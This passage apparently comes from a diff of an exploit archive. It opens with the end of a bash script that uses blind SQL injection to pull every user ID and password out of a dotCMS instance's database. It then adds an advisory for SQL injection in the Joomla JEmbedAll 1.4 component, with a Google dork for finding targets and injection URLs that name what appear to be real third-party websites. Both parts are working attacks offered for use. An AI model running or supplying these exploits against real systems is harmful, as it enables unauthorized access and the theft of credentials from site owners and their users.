echo -n $chr
}
iter_chars() {
target=$1
db=$2
user=$3
offset=$4
column=$5
for c in {32..36} {38..94} {96..126}
do
c=$(n2chr $c)
res=$(dump_char $target $c $db $user $offset $column)
if [ ! -z "$res" ];
then
chr2a $res
break
fi
done
}
exploit() {
target=$1
db=$(testdb $target)
if [ -z "$db" ];
then
echo "Unable to identify database name used by dotcms instance!"
exit 1
fi
echo "Dumping users and passwords from database..."
echo
for user in $(seq 0 1023);
do
validuser=1
echo -n "| $user | "
for offset in $(seq 1 1024);
do
res=$(iter_chars $target $db $user $offset "userid")
if [ -z "$res" ];
then
if [ $offset -eq 1 ];
then
validuser=0
fi
break
fi
echo -n "$res";
done
if [ $validuser -eq 1 ];
then
printf " | "
else
printf " |\n"
break
fi
for offset in $(seq 1 1024);
do
res=$(iter_chars $target $db $user $offset "password_")
if [ -z "$res" ];
then
break
fi
echo -n "$res";
done
printf " |\n"
done
echo
echo "Dumping complete!"
}
target=$1
if [ -z "$target" ];
then
show_usage
fi
test_exploit $target
exploit $target

25
platforms/php/webapps/41378.txt Executable file
View file

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Joomla! Component JEmbedAll v1.4 - SQL Injection
# Google Dork: inurl:index.php?option=com_jembedall
# Date: 16.02.2017
# Vendor Homepage: http://www.goldengravel.eu/
# Software Buy: https://extensions.joomla.org/extensions/extension/core-enhancements/coding-a-scripts-integration/jembedall/
# Demo: http://www.goldengravel.eu/
# Version: 1.4
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jembedall&downloadfree=[SQL]
# http://localhost/[PATH]/index.php?option=com_jembedall&export=articlepdf&id=[SQL]
# # # # #
http://www.goldengravel.eu/index.php?option=com_jembedall&downloadfree=4'
http://www.goldengravel.eu/index.php?option=com_jembedall&export=articlepdf&id=4'
http://www.supravirtual.ro/index.php?option=com_jembedall&downloadfree=4'
http://www.supravirtual.ro/index.php?option=com_jembedall&export=articlepdf&id=4'